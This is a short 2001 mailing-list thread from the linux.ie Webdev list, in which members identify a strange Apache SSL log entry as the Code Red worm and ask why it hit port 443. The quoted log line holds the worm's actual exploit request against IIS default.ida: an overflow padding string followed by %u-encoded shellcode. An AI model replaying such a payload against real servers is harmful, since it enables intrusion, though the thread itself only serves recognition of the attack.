[Webdev] Weird SSL logs
Patrick Lynch
patrick.lynch at eirco.com
Tue Aug 28 10:29:16 IST 2001
I thought that code red specifically went for port 80 on a web server?
Doesn't SSL/https work on Port 443?
/P
-----Original Message-----
From: David O'Callaghan [mailto:ocalladw at tcd.ie]
Sent: 28 August 2001 10:09
To: webdev at linux.ie
Subject: Re: [Webdev] Weird SSL logs
On Tue, Aug 28, 2001 at 09:53:26AM -0400, AJ McKee wrote:
> HI guys,
>
> I presume when one sees this in an Apache SSL log file its some script
> kiddie? Aj
>
>
> https://www.mysite.com/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXXX
>
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
>
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
>
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u
>
7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff
> %u0078%u0000%u00=a
This is the Code Red worm (Version 2, I believe). If you had an unpatched
Microsoft IIS box it would be rooted and doing this to others by now. ;)
David
_______________________________________________
Webdev mailing list
Webdev at linux.ie
http://www.linux.ie/mailman/listinfo/webdev
More information about the Webdev
mailing list